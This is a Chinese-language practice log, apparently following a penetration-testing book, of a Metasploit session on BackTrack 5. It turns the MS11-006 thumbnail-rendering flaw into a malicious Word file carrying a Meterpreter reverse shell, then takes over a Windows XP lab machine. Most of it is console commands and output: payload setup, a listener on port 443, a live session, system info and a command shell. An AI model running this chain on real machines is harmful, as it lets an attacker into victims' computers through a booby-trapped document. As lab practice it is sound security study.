环境BT5R1
msf > use windows/fileformat/ms11_006_createsizeddibsection
msf exploit(ms11_006_createsizeddibsection) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms11_006_createsizeddibsection) > set LHOST 192.168.1.11
LHOST => 192.168.1.11
msf exploit(ms11_006_createsizeddibsection) > set LPORT 443
LPORT => 443
msf exploit(ms11_006_createsizeddibsection) > set OUTPUTPATH /opt/framework/msf3/data/exploits/
OUTPUTPATH => /opt/framework/msf3/data/exploits/
msf exploit(ms11_006_createsizeddibsection) > show options
Module options (exploit/windows/fileformat/ms11_006_createsizeddibsection):
Name Current Setting Required Description
---- --------------- -------- -----------
FILENAME msf.doc yes The file name.
OUTPUTPATH /opt/framework/msf3/data/exploits/ yes The output path to use.
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC seh yes Exit technique: seh, thread, process, none
LHOST 192.168.1.11 yes The listen address
LPORT 443 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(ms11_006_createsizeddibsection) > exploit
[*] Creating 'msf.doc' file ...
[*] Generated output file /opt/framework/msf3/data/exploits/msf.doc
msf exploit(ms11_006_createsizeddibsection) > use multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.11
LHOST => 192.168.1.11
msf exploit(handler) > set LPORT 443
LPORT => 443
msf exploit(handler) > exploit -j
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.1.11:443
[*] Starting the payload handler...
msf exploit(handler) > sessions -l
Active sessions
===============
No active sessions.
msf exploit(handler) >
把msf.doc复制到XP里,一开始,双击,BT5没反应。
后来,我用缩略图来查看,不需要双击msf.doc,BT5就有反应了(书中说是要打开该文档,估计有误)。
msf exploit(handler) >
[*] Sending stage (752128 bytes) to 192.168.1.143
[*] Meterpreter session 1 opened (192.168.1.11:443 -> 192.168.1.143:1099) at 2013-05-14 19:32:47 -0400
msf exploit(handler) > sessions -l
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter x86/win32 ROOT-4556186478\Administrator @ ROOT-4556186478 192.168.1.11:443 -> 192.168.1.143:1099
msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > ls
Listing: C:\Documents and Settings\Administrator
================================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40777/rwxrwxrwx 0 dir 2013-05-14 10:20:44 -0400 .
40777/rwxrwxrwx 0 dir 2013-05-14 10:20:43 -0400 ..
40555/r-xr-xr-x 0 dir 2013-05-14 10:21:13 -0400 Application Data
40777/rwxrwxrwx 0 dir 2013-05-14 10:14:40 -0400 Cookies
40777/rwxrwxrwx 0 dir 2013-05-14 17:51:30 -0400 Desktop
40555/r-xr-xr-x 0 dir 2013-05-14 10:21:21 -0400 Favorites
40777/rwxrwxrwx 0 dir 2013-05-14 17:51:30 -0400 Local Settings
40555/r-xr-xr-x 0 dir 2013-05-14 10:21:22 -0400 My Documents
100666/rw-rw-rw- 786432 fil 2013-05-14 11:30:17 -0400 NTUSER.DAT
40777/rwxrwxrwx 0 dir 2013-05-14 17:51:30 -0400 NetHood
40777/rwxrwxrwx 0 dir 2013-05-14 17:51:30 -0400 PrintHood
40555/r-xr-xr-x 0 dir 2013-05-14 11:30:35 -0400 Recent
40555/r-xr-xr-x 0 dir 2013-05-14 10:21:02 -0400 SendTo
40555/r-xr-xr-x 0 dir 2013-05-14 17:51:30 -0400 Start Menu
40777/rwxrwxrwx 0 dir 2013-05-14 10:10:10 -0400 Templates
100666/rw-rw-rw- 1024 fil 2013-05-14 11:32:49 -0400 ntuser.dat.LOG
100666/rw-rw-rw- 178 fil 2013-05-14 10:23:33 -0400 ntuser.ini
meterpreter > sysinfo
Computer : ROOT-4556186478
OS : Windows XP (Build 2600, Service Pack 3).
Architecture : x86
System Language : en_US
Meterpreter : x86/win32
meterpreter > shell
Process 1888 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\Administrator>
如果换到简体中文版本的XP上面,用缩略图查看,则会失败,无法获得shell。